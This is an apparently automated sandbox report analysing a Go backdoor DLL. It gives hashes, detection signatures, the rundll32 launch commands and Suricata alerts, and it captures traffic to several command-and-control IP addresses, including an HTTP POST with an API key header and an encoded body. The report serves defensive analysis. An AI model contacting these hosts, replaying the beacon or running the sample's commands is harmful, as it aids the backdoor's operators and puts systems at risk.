Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
Analysis ID:1490750
MD5:ff432e4003e9d7135a97bd4dc0445dc3
SHA1:41530cb367ca6b69378179b4bba91deaf7d3a342
SHA256:03495c3e0d041d6c6c1949cf6cfabea9b3d4308fee9cbf85754bb00b434d3778
Tags:dll
Infos:

Detection

GO Backdoor
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • loaddll32.exe (PID: 6860 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6996 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7100 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7020 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5480 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7132 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3060 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: rundll32.exe PID: 7020JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Process Memory Space: rundll32.exe PID: 7100JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
      Process Memory Space: rundll32.exe PID: 7132JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
        No Sigma rule has matched
        Timestamp:2024-08-09T19:28:49.448134+0200
        SID:2855536
        Severity:1
        Source Port:49739
        Destination Port:26395
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-09T19:28:49.429828+0200
        SID:2855539
        Severity:1
        Source Port:26395
        Destination Port:49739
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-09T19:29:19.090843+0200
        SID:2855538
        Severity:1
        Source Port:26395
        Destination Port:49739
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-09T19:29:18.867934+0200
        SID:2855537
        Severity:1
        Source Port:49739
        Destination Port:26395
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllReversingLabs: Detection: 36%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

        Networking

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.229.63 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.2.70.38 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.224.56 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 91.142.74.28 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 77.238.250.123 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 94.103.90.9 26395Jump to behavior
        Source: global trafficTCP traffic: 94.103.90.9 ports 2,26395,3,5,6,9
        Source: rundll32.exe, 00000003.00000002.3546566789.000000006B46B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
        Source: rundll32.exe, 00000004.00000002.3546365132.000000006B46B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
        Source: rundll32.exe, 00000005.00000002.2007679967.000000006B46B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
        Source: rundll32.exe, 00000006.00000002.3544673830.000000006B46B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
        Source: rundll32.exe, 00000007.00000002.2047988912.000000006B46B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
        Source: global trafficTCP traffic: 192.168.2.4:49739 -> 94.103.90.9:26395
        Source: Joe Sandbox ViewIP Address: 91.142.74.28 91.142.74.28
        Source: Joe Sandbox ViewIP Address: 77.238.229.63 77.238.229.63
        Source: Joe Sandbox ViewASN Name: VTSL1-ASRU VTSL1-ASRU
        Source: Joe Sandbox ViewASN Name: TELERU-ASRU TELERU-ASRU
        Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
        Source: Joe Sandbox ViewASN Name: TELERU-ASRU TELERU-ASRU
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 91.142.74.28
        Source: unknownTCP traffic detected without corresponding DNS query: 195.2.70.38
        Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 195.2.70.38User-Agent: Go-http-client/1.1Content-Length: 158X-Api-Key: 4bxNKbGLAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.90.9:26395 -> 192.168.2.4:49739
        Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.4:49739 -> 94.103.90.9:26395
        Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.4:49739 -> 94.103.90.9:26395
        Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 94.103.90.9:26395 -> 192.168.2.4:49739
        Source: rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://195.2.70.38
        Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://77.238.224.56
